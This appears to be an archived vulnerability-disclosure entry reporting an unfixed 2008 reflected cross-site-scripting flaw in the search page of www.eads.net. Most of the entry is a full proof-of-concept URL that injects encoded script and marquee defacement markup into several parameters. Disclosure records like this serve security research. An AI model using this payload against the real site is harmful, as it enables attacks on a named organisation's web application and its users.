Security researcher xylitol, has submitted on 16/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.eads.net, which at the time of submission ranked 63888 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 16/06/2008 |
Date published: 05/07/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: xylitol |
Domain: www.eads.net |
Category: XSS |
Pagerank: 63888 |
|---|
URL: http://www.eads.net/search/search.jsp?&p_Action=Search&p_AppLang='%22%3E%3C/title%3E%3Cscript%3Ealer
t(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xyl%3C/h1%3E%3C/marquee%3Efr&p_callingWeb=ead
s&extern=airbus_military&p_Query=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3
E%3Cmarquee%3E%3Ch1%3EXSS+by+Xyl%3C%2Fh1%3E%3C%2Fmarquee%3E&p_AttrOp=AND&p_AttrID=4&p_AttrQ=%27%22%3
E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+Xyl%3C%2Fh1%
3E%3C%2Fmarquee%3E&p_AttrOp=AND&p_AttrID=6&p_AttrQ=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%2
9%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+Xyl%3C%2Fh1%3E%3C%2Fmarquee%3E&p_AttrOp=AND&p_AttrID=
2&p_AttrQ=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EX
SS+by+Xyl%3C%2Fh1%3E%3C%2Fmarquee%3E&p_AttrOp=AND&p_AttrID=3&p_AttrQ=%27%22%3E%3C%2Ftitle%3E%3Cscrip
t%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+Xyl%3C%2Fh1%3E%3C%2Fmarquee%3E&p_At
trOp=AND&p_AttrID=5&p_AttrQ=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cm
arquee%3E%3Ch1%3EXSS+by+Xyl%3C%2Fh1%3E%3C%2Fmarquee%3E&p_hitsPerPage=10'%22%3E%3C/title%3E%3Cscript%
3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xyl%3C/h1%3E%3C/marquee%3E&p_Advanced=1
'%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xyl%3C/h1%
3E%3C/marquee%3E |
|
Click here to view the mirror
|
|
|
| 
